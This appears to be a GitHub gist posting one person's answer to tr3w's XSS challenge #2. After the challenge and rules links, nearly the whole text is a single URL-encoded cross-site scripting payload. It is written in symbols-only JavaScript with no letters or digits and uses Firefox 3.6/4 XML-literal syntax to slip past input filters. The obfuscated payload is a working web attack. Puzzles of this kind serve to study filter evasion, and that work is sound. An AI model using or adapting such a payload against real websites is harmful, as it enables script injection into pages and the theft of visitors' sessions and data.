Skip to content

Instantly share code, notes, and snippets.

@hasegawayosuke
Created March 21, 2011 13:42
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hasegawayosuke/879457 to your computer and use it in GitHub Desktop.
Save hasegawayosuke/879457 to your computer and use it in GitHub Desktop.
my answer of tr3w's XSS challenge #2
Challenge:
http://tr3w.net/misc/challenges/ch2.php
Rule and score:
http://tr3w.net/misc/challenges/ch2rules.txt
My answer:
http://tr3w.net/misc/challenges/ch2.php?w={$=/%28[^$]*%29/}{_=!![]*!![]}{__=%3C%3E{$%28{}%29[_][_%3C%3C_%3C%3C_^_]}{$%28{}%29[_][_]}{$%28{}[[]]%29[_][_]}{$%28![]%29[_][_%3C%3C_^_]}{$%28!![]%29[_][_^_]}{$%28!![]%29[_][_]}{$%28!![]%29[_][_%3C%3C_]}{$%28{}%29[_][_%3C%3C_%3C%3C_^_]}{$%28!![]%29[_][_^_]}{$%28{}%29[_][_]}{$%28!![]%29[_][_]}%3C/%3E}{_$=%3C%3E{$%28!![]%29[_][_]}{$%28![]%29[_][_%3C%3C_%3C%3C_]}{$%28!![]%29[_][_^_]}{$%28!![]%29[_][_%3C%3C_]}{$%28!![]%29[_][_]}{$%28{}[[]]%29[_][_]}%3C/%3E}{$$=%28![]%29[__][__]%28%3C%3E{_$}/**/{$%28![]%29[_][_%3C%3C_^_]}{$%28![]%29[_][_%3C%3C_%3C%3C_]}{$%28![]%29[_][_%3C%3C_]}{$%28![]%29[_][_^_]}%3C/%3E%29%28%29}{%28![]%29[__][__]%28%3C%3E{_$}/**/{$%28![]%29[_][_]}{$%28![]%29[_][_%3C%3C_]}{$%28![]%29[_][_%3C%3C_%3C%3C_]}{$%28!![]%29[_][_]}{$%28!![]%29[_][_^_]}%3C/%3E%29%28%29%28%28![]%29[__][__]%28%3C%3E{_$}/**/{$%28{}[[]]%29[_][_%3C%3C_]}{$%28{}%29[_][_]}{$%28{}%29[_][_%3C%3C_%3C%3C_^_]}{$%28{}[[]]%29[_][_^_]}{$%28%28[]*[]%29[__]%20%29[_][_%3C%3C_%3C%3C_%3C%3C_^_%3C%3C_^_]}{$%28!![]%29[_][_%3C%3C_^_]}{$%28{}[[]]%29[_][_]}{$%28!![]%29[_][_^_]}%3C/%3E%29%28%29[%3C%3E{$%28{}%29[_][_%3C%3C_%3C%3C_^_]}{$%28{}%29[_][_]}{$%28{}%29[_][_]}{$$[%3C%3E{$%28![]%29[_][_]}{$%28!![]%29[_][_^_]}{$%28{}%29[_][_]}{$%28{}%29[_][_%3C%3C_]}%3C/%3E]%28[%3C%3E{$%28![]%29[_][_]}{$%28$$%29[_][_%3C%3C_%3C%3C_%3C%3C_^_%3C%3C_%3C%3C_^_]}%3C/%3E]%29}{$%28%28![]%29[__]%29[_][_%3C%3C_%3C%3C_^_]}{$%28!![]%29[_][_%3C%3C_^_]}%3C/%3E]%29}
no-alnum, symbols only JS for Firefox 3.6/4
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment